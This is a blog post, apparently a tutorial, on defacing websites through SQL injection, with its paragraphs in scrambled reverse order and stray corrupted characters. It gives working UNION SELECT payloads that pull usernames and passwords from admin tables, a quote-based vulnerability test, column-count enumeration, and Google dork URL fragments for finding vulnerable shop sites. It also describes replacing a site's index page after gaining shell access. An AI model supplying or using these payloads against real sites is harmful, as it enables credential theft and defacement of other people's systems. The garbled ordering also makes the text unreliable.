union all select 1,concat(username,0x3a,password),3 from admin/* We see password on the screen in hash or plain-text, it depends of how the database is set upįor that we can use concat() function (it joins strings) union all select 1,password,3 from admin/* (if you get an error, then try the other column name) We get a username displayed on screen, examplse would be admin, or superadmin etc… union all select 1,username,3 from admin/* (if you get an error, then try the other column name) union all select 1,2,3 from admin/* (we see number 2 on the screen like before, and that’s good ) We must guess table and column name in most cases.Ĭommon table names are: user/s, admin/s, member/s …Ĭommon column names are: username, user, usr, user_name, password, pass, passwd, pwd etc… Increment the number until we get an error. To find the number of columns we use the statement ORDER BY (tells the database how to order the result). Or something similar, that means the site is vulnerable to SQL injection. “You have an error in your SQL syntax check the manual that corresponds to your MySQL server version for the right etc…” To test if is vulernable, we add to the end of url ‘ (quote), You can also refer to my previous post of hacking websites: Hacking websites: How to hack websites By using SQL Injection Now the Admin password hacking procedure starts: "productlist.asp?ViewENGINE=Category&CategoryID= " "listcategoriesandproducts.asp?idCategory=" "comersus_optReviewReadExec.asp?idProduct=" "comersus_optEmailToFriendForm.asp?idProduct=" "comersus_listCategoriesAndProducts.asp?idCategory =" Here are some additional queries (use them without quotation marks). Below is example of some queries.Įxamples: Open Google and copy and paste these queries: Some Google searches can be wonderfully utilized to find out vulnerable websites. I have collected a lot of dorks i.e the vulnerability points of the websites. Finding the Target and the Admin Passwordįirst of all we must find out our target website. Most of it was written by me so I can clear up any confusion you may have.ġ. Shell Script (for getting Admin Controls)įirst of all, I would like to say that I took parts of an SQL injection tutorial from my previous posts and a site. SQL Injection (for analyzing website loops)ģ. Then all the users who open it will see our page (i.e the page being uploaded by us).įor defacing a website, three things that you need are:ġ. FIRST OF ALL YOU SHOULD KNOW: WHAT IS DEFACEMENT?ĭefacing a website simply means that we replace the index.html file of a site with our file.
0 Comments
Leave a Reply. |
AuthorWrite something about yourself. No need to be fancy, just an overview. Archives
March 2023
Categories |